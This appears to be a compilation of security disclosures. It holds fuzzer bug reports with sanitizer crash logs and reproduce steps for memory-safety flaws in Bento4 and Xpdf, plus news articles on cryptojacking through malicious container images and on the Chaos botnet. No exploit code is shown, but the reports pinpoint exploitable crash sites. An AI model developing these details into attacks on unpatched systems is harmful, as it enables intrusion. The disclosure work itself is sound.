    =================================================================
    ==750986==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f5fc13c0306 bp 0x7ffe16f62f30 sp 0x7ffe16f626c8 T0)
    ==750986==The signal is caused by a READ memory access.
    ==750986==Hint: address points to the zero page.
        #0 0x7f5fc13c0306  (/lib/x86_64-linux-gnu/libc.so.6+0xb1306)
        #1 0x94da2c in __interceptor_strlen.part.36 /llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:370
        #2 0x6ec0c2 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) (/mp4box/mp4fragment/mp4fragment+0x6ec0c2)
        #3 0x432bbc in main (/mp4box/mp4fragment/mp4fragment+0x432bbc)
        #4 0x7f5fc1330c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #5 0x407cd9 in _start (/mp4box/mp4fragment/mp4fragment+0x407cd9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xb1306) 
    ==750986==ABORTING
    
    

**POC**

POC-Mp4fragment-1.zip

**Environment**

Ubuntu 18.04.6 LTS (docker)  
clang 12.0.1  
clang++ 12.0.1  
Bento4 master branch(5b7cc25) && Bento4 release version(1.6.0-639)

**Credit**

Xudong Cao (NCNIPC of China)  
Jiayuan Zhang (NCNIPC of China)  
Han Zheng (NCNIPC of China, Hexhive)

Thank you for your time!

CVE-2022-41423: From mp4fragment: SEGV on unknown address 0x000000000000 · Issue #767 · axiomatic-systems/Bento4

Bento4 v1.6.0-639 was discovered to contain a memory leak via the AP4_Processor::Process function in the mp4encrypt binary.

**Summary**

Hi, developers of Bento4:  
I tested the binary mp4encrypt with my fuzzer, and a crash incurred, i.e., memory leaks error. The version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker). The following is the details.

**Details**

    root@c08635047aea:/fuzz-mp4encrypt/mp4encrypt# ./mp4encrypt --method MARLIN-IPMP-ACBC ../out/crashes/id\:000007\,sig\:06\,src\:000001\,op\:flip1\,pos\:14136\,934837 /dev/null
    WARNING: track ID 1 will not be encrypted
    WARNING: atom serialized to fewer bytes than declared size
    
    =================================================================
    ==3055140==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 104 byte(s) in 1 object(s) allocated from:
        #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f)
        #3 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c)
        #4 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 3328 byte(s) in 2 object(s) allocated from:
        #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x5b2921 in AP4_MarlinIpmpEncryptingProcessor::Initialize(AP4_AtomParent&, AP4_ByteStream&, AP4_Processor::ProgressListener*) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x5b2921)
        #3 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f)
        #4 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c)
        #5 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 1024 byte(s) in 1 object(s) allocated from:
        #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x8b62f9 in AP4_Expandable::Write(AP4_ByteStream&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x8b62f9)
        #3 0x5b2540 in AP4_MarlinIpmpEncryptingProcessor::Initialize(AP4_AtomParent&, AP4_ByteStream&, AP4_Processor::ProgressListener*) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x5b2540)
        #4 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f)
        #5 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c)
        #6 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 224 byte(s) in 5 object(s) allocated from:
        #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f)
        #3 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c)
        #4 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: 4680 byte(s) leaked in 9 allocation(s).
    
    

**POC**

mp4encrypt\_poc1.zip

**Environment**

Ubuntu 18.04.6 LTS (docker)  
clang 12.0.1  
clang++ 12.0.1  
Bento4 master branch(5b7cc25) && Bento4 release version(1.6.0-639)

**Credit**

Xudong Cao (NCNIPC of China)  
Han Zheng (NCNIPC of China, Hexhive)

Thank you for your time!

CVE-2022-41419: Detected memory leaks in mp4encrypt · Issue #766 · axiomatic-systems/Bento4

An issue was discovered in Bento4 1.6.0-639. A memory leak exists in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) in System/StdC/Ap4StdCFileByteStream.cpp.

Hello, I use fuzer to test binary acc2mp4, and found some carshes, which can result binary mp4split crash too. Here are the details.

**Bug1**

    root@d5f4647d38bd:/aac2mp4/aac2mp4# /Bento4/build/aac2mp4 crash1 /dev/null
    AAC frame [000000]: size = -7, 96000 kHz, 0 ch
    =================================================================
    ==813117==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62d000008400 at pc 0x0000004ad912 bp 0x7ffe2c57b390 sp 0x7ffe2c57ab40
    READ of size 4294967287 at 0x62d000008400 thread T0
        #0 0x4ad911 in __asan_memcpy /llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22
        #1 0x4facae in AP4_BitStream::ReadBytes(unsigned char*, unsigned int) /Bento4/Source/C++/Codecs/Ap4BitStream.cpp:192:10
        #2 0x4f8485 in main /Bento4/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp:142:29
        #3 0x7fec98881c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #4 0x41c349 in _start (/Bento4/build/aac2mp4+0x41c349)
    
    0x62d000008400 is located 0 bytes to the right of 32768-byte region [0x62d000000400,0x62d000008400)
    allocated by thread T0 here:
        #0 0x4f4638 in operator new[](unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:102
        #1 0x4fa30d in AP4_BitStream::AP4_BitStream() /Bento4/Source/C++/Codecs/Ap4BitStream.cpp:45:16
        #2 0x7fec98881c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x0c5a7fff9030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5a7fff9040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5a7fff9050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5a7fff9060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5a7fff9070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c5a7fff9080:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5a7fff9090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5a7fff90a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5a7fff90b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5a7fff90c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5a7fff90d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==813117==ABORTING
    
    

**Bug2**

    root@d5f4647d38bd:/aac2mp4/aac2mp4# ./mp4split crash2
    no movie found in file
    
    =================================================================
    ==888268==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 48 byte(s) in 1 object(s) allocated from:
        #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x5de94f in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14
    
    Indirect leak of 256 byte(s) in 1 object(s) allocated from:
        #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x536495 in AP4_Array<unsigned int>::EnsureCapacity(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:172:25
        #2 0x536495 in AP4_Array<unsigned int>::Append(unsigned int const&) /Bento4/Source/C++/Core/Ap4Array.h:252:29
        #3 0x536495 in AP4_FtypAtom::AP4_FtypAtom(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4FtypAtom.cpp:57:28
        #4 0x50966b in AP4_FtypAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4FtypAtom.h:66:20
        #5 0x50966b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:630:20
        #6 0x507ec4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
        #7 0x5076ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
        #8 0x5350be in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12
        #9 0x5357ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5
        #10 0x4f841f in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:26
        #11 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 88 byte(s) in 1 object(s) allocated from:
        #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x507f57 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:242:16
        #2 0x5076ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
        #3 0x5350be in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12
        #4 0x5357ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5
        #5 0x4f841f in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:26
        #6 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 72 byte(s) in 1 object(s) allocated from:
        #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x4f83f7 in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:22
        #2 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 72 byte(s) in 1 object(s) allocated from:
        #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x509659 in AP4_FtypAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4FtypAtom.h:66:16
        #2 0x509659 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:630:20
        #3 0x507ec4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14
        #4 0x5076ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12
        #5 0x5350be in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12
        #6 0x5357ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5
        #7 0x4f841f in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:26
        #8 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 48 byte(s) in 2 object(s) allocated from:
        #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x4fd2d3 in AP4_List<AP4_Atom>::Add(AP4_Atom*) /Bento4/Source/C++/Core/Ap4List.h:160:16
        #2 0x4fd2d3 in AP4_AtomParent::AddChild(AP4_Atom*, int) /Bento4/Source/C++/Core/Ap4Atom.cpp:532:29
    
    SUMMARY: AddressSanitizer: 584 byte(s) leaked in 7 allocation(s).
    

**Environment**

Ubuntu 18.04(docker)  
clang 12.0.1  
clang++ 12.0.1  
Bento4 master branch(5b7cc25)

**How to reproduce**

    export CC=clang
    export CXX=clang++
    export CFLAGS="-fsanitize=address -g"
    export CXXFLAGS="-fsanitize=address -g"
    mkdir build
    cd build
    cmake -DCMAKE_BUILD_TYPE=Release ..
    make
    
    

**POC**

crash.zip

**Credit**

Yuhang Huang (NCNIPC of China)  
Han Zheng (NCNIPC of China, Hexhive)  
Yin li,Jiayu Zhao(NCNIPC of China)

**Notice**

I find the two bugs not only exist in latest branch but also exist in latest release version Bento4-1.6.0-639.  
The bug1 is similar to the issuse#363(CVE-2019-8378),which means this bug hasn't been fixed now.

Thanks for your time!

CVE-2022-41847: there are some bugs in Bento4 · Issue #775 · axiomatic-systems/Bento4

There is a use-after-free issue in JBIG2Stream::close() located in JBIG2Stream.cc in Xpdf 4.04. It can be triggered by sending a crafted PDF file to (for example) the pdfimages binary. It allows an attacker to cause Denial of Service or possibly have unspecified other impact.

Hello, I was testing my fuzzer and found a use-after-free in xpdf-4.04, can be triggered via a crafted pdf file.

\## Environment  
Ubuntu 22.04 (docker)  
gcc-11.2.0  
xpdf-4.04

\## step to reporduce  
\`\`\`  
cd $PATH\_TO\_XPDF && mkdir build && pushd build  
cmake -DCMAKE\_BUILD\_TYPE=Release -DCMAKE\_C\_FLAGS="-fsanitize=address -g" -DCMAKE\_CXX\_FLAGS="-fsanitize=address -g" ../  
./xpdf/pdfimages $POC /dev/null  
\`\`\`  
\## ASan Log  
\`\`\`  
\=================================================================  
\==1164636==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000012970 at pc 0x55c1c290fa1a bp 0x7ffc26bd4430 sp 0x7ffc26bd4420  
READ of size 8 at 0x603000012970 thread T0  
#0 0x55c1c290fa19 in JBIG2Stream::close() /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:1216  
#1 0x55c1c290fa84 in JBIG2Stream::~JBIG2Stream() /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:1180  
#2 0x55c1c290ffdc in JBIG2Stream::~JBIG2Stream() /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:1202  
#3 0x55c1c293642a in Object::free() /validate/xpdf/xpdf-4.04/xpdf/Object.cc:138  
#4 0x55c1c280217d in Gfx::opXObject(Object\*, int) /validate/xpdf/xpdf-4.04/xpdf/Gfx.cc:4136  
#5 0x55c1c2868ab3 in Gfx::execOp(Object\*, Object\*, int) /validate/xpdf/xpdf-4.04/xpdf/Gfx.cc:862  
#6 0x55c1c2868f88 in Gfx::go(int) /validate/xpdf/xpdf-4.04/xpdf/Gfx.cc:747  
#7 0x55c1c28695a6 in Gfx::display(Object\*, int) /validate/xpdf/xpdf-4.04/xpdf/Gfx.cc:669  
#8 0x55c1c2943025 in Page::displaySlice(OutputDev\*, double, double, int, int, int, int, int, int, int, int, int (\*)(void\*), void\*) /validate/xpdf/xpdf-4.04/xpdf/Page.cc:422  
#9 0x55c1c2943882 in Page::display(OutputDev\*, double, double, int, int, int, int, int (\*)(void\*), void\*) /validate/xpdf/xpdf-4.04/xpdf/Page.cc:368  
#10 0x55c1c294d4a3 in PDFDoc::displayPages(OutputDev\*, int, int, double, double, int, int, int, int, int (\*)(void\*), void\*) /validate/xpdf/xpdf-4.04/xpdf/PDFDoc.cc:460  
#11 0x55c1c280656d in main /validate/xpdf/xpdf-4.04/xpdf/pdfimages.cc:156  
#12 0x7efd8b7e7d8f in \_\_libc\_start\_call\_main ../sysdeps/nptl/libc\_start\_call\_main.h:58  
#13 0x7efd8b7e7e3f in \_\_libc\_start\_main\_impl ../csu/libc-start.c:392  
#14 0x55c1c28070b4 in \_start (/validate/xpdf/xpdf-4.04/build/xpdf/pdfimages+0x1280b4)

0x603000012970 is located 0 bytes inside of 32-byte region \[0x603000012970,0x603000012990)  
freed by thread T0 here:  
#0 0x7efd8bdd022f in operator delete(void\*, unsigned long) ../../../../src/libsanitizer/asan/asan\_new\_delete.cpp:172  
#1 0x55c1c290b19f in JBIG2Bitmap::~JBIG2Bitmap() /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:740  
#2 0x55c1c290b19f in JBIG2Stream::readPageInfoSeg(unsigned int) /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:3960

previously allocated by thread T0 here:  
#0 0x7efd8bdcf1c7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan\_new\_delete.cpp:99  
#1 0x55c1c290b1fd in JBIG2Stream::readPageInfoSeg(unsigned int) /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:3969

SUMMARY: AddressSanitizer: heap-use-after-free /validate/xpdf/xpdf-4.04/xpdf/JBIG2Stream.cc:1216 in JBIG2Stream::close()  
Shadow bytes around the buggy address:  
0x0c067fffa4d0: fd fd fa fa fd fd fd fa fa fa 00 00 01 fa fa fa  
0x0c067fffa4e0: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd  
0x0c067fffa4f0: fa fa fd fd fd fd fa fa fd fd fd fa fa fa 00 00  
0x0c067fffa500: 01 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa  
0x0c067fffa510: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 00  
\=>0x0c067fffa520: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa\[fd\]fd  
0x0c067fffa530: fd fd fa fa fd fd fd fd fa fa fa fa fa fa fa fa  
0x0c067fffa540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fffa550: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fffa560: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fffa570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==1164636==ABORTING  
\`\`\`  
\## Credit  
Han Zheng, NCNIPC of China, Hexhive

\## POC

CVE-2022-38222: [BUG] use-after-free in pdfimages,xpdf-4.04 - forum.xpdfreader.com

Cloud-native threats are costing cloud customer victims money as cryptojackers mine their vulnerable cloud instances.

Threats against cloud-native infrastructure are on the rise, particularly as attackers target cloud and container resources to power their illicit cryptomining operations. In the latest twist, cybercriminals are wreaking havoc on cloud resources to both propagate and run cryptojacking enterprises in costly schemes that cost victims some $50 in cloud resources for every $1 worth of cryptocurrency that the crooks mine off of these compute reserves.

That's according to a new report out today from Sysdig, which shows that while the bad guys will indiscriminately attack any weak cloud or container resources they can get their hands on to power money-making cryptomining schemes, they're also cleverly strategic about it. 

In fact, many of the most crafty software supply chain attacks are in large part designed to spawn cryptominers via infected container images. Attackers not only leverage source code dependencies most commonly thought of in offensive supply chain attacks — they also leverage malicious container images as an effective attack vehicle, according to Sysdig's "2022 Cloud-Native Threat Report." 

Cybercriminals are taking advantage of the trend within the development community to share code and open source projects via premade container images via container registries like Docker Hub. Container images have all the required software installed and configured in an easy-to-deploy workload. While that's a serious time saver for developers, it also opens up a path for attackers to create images that have malicious payloads built in and then to seed platforms like DockerHub with their malicious wares. All it takes is for a developer to run a Docker pull request from the platform to get that malicious image running. What's more, the Docker Hub download and installation is opaque, making it even harder to spot the potential for trouble.

"It’s clear that container images have become a real attack vector, rather than a theoretical risk," the report explained, for which the Sysdig Threat Research Team (TRT) went through a monthslong process of sifting through public container images uploaded by users worldwide onto DockerHub to find malicious instances. "The methods employed by malicious actors described by Sysdig TRT are specifically targeted at cloud and container workloads."

The team's hunt surfaced more than 1,600 malicious images containing cryptominers, backdoors, and other nasty malware disguised as legitimate popular software. Cryptominers were far and away the most prevalent, making up 36% of the samples.

"Security teams can no longer delude themselves with the idea that 'containers are too new or too ephemeral for threat actors to bother,'" says Stefano Chierici, senior security researcher at Sysdig and co-author of the report. "Attackers are in the cloud, and they are taking real money. The high prevalence of cryptojacking activity is attributable to the low risk and high reward for the perpetrators."

**TeamTNT and Chimera**

As a part of the report, Chierici and his colleagues also did a deep-dive technical analysis of the tactics, techniques, and procedures (TTPs) of the TeamTNT threat group. Active since 2019, the group according to some sources has compromised over 10,000 cloud and container devices during one of its most prevalent attack campaigns, Chimera. It's best known for cryptojacking worm activity and according to the report, TeamTNT continues to refine its scripts and its TTPs in 2022. For example, it now connects scripts with the AWS Cloud Metadata service to leverage credentials associated with an EC2 instance and gain access to other resources tied to a compromised instance.

"If there are excessive permissions associated with these credentials, the attacker could gain even more access. Sysdig TRT believes that TeamTNT would want to leverage these credentials, if capable, to create more EC2 instances so it could increase its cryptomining capabilities and profits," the report said.

As part of its analysis, the team dug into a a number of XMR wallets used by TeamTNT during mining campaigns to figure out the financial impact of cryptojacking. 

Utilizing technical analysis of the threat group's operational practices during the Chimera operation, Sysdig was able to find that the adversary cost its victims $11,000 on a single AWS EC2 instance for every XMR it mined. The wallets the team recovered amounted some 40 XMR, meaning that the attackers drove up a cloud bill of nearly $430,000 to mine those coins. 

Using coin valuation from earlier this year, the report estimated the value of those coins equals about $8,100, with back-of-envelope figuring then showing that for every dollar the bad guys make, they cost victims at least $53 in cloud bills alone.

Container Supply Chain Attacks Cash In on Cryptojacking

A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.
"Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through

A new, multi-functional Go-based malware dubbed **Chaos** has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.

"Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute-forcing SSH private keys, as well as launch DDoS attacks," researchers from Lumen's Black Lotus Labs said in a write-up shared with The Hacker News.

A majority of the bots are located in Europe, specifically Italy, with other infections reported in China and the U.S., collectively representing "hundreds of unique IP addresses" over a one-month time period from mid-June through mid-July 2022.

Written in Chinese and leveraging China-based infrastructure for command-and-control, the botnet joins a long list of malware that are designed to establish persistence for extended periods and likely abuse the foothold for nefarious purposes, such as DDoS attacks and cryptocurrency mining.

If anything, the development also points to a dramatic uptick in threat actors shifting to programming languages like Go to evade detection and render reverse engineering difficult, not to mention targeting several platforms at once.

Chaos (not to be confused with the ransomware builder of the same name) lives up to its name by exploiting known security vulnerabilities to gain initial access, subsequently abusing it to conduct reconnaissance and initiate lateral movement across the compromised network.

What's more, the malware has versatility that similar malware does not, enabling it to operate across a wide range of instruction set architectures from ARM, Intel (i386), MIPS, and PowerPC, effectively allowing the threat actor to broaden the scope of its targets and swiftly accrue in volume.

On top of that, Chaos further has the ability to execute as many as 70 different commands sent from the C2 server, one of which is an instruction to trigger the exploitation of publicly-disclosed flaws (CVE-2017-17215 and CVE-2022-30525) defined in a file.

Chaos is also believed to be an evolution of another Go-based DDoS malware named Kaiji that has previously targeted misconfigured Docker instances. The correlations, per Black Lotus Labs, stem from overlapping code and functions based on an analysis of over 100 samples.

A GitLab server located in Europe was one among the victims of the Chaos botnet in the first weeks of September, the company said, adding it identified a string of DDoS attacks aimed at entities spanning gaming, financial services, and technology, media and entertainment, and hosting providers. Also targeted was a crypto mining exchange.

The findings come exactly three months after the cybersecurity company exposed a new remote access trojan dubbed ZuoRAT that has been singling out SOHO routers as part of a sophisticated campaign directed against North American and European networks.

"We are seeing a complex malware that has quadrupled in size in just two months, and it is well-positioned to continue accelerating," said Mark Dehus, director of threat intelligence for Lumen Black Lotus Labs. "Chaos poses a threat to a variety of consumer and enterprise devices and hosts."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#docker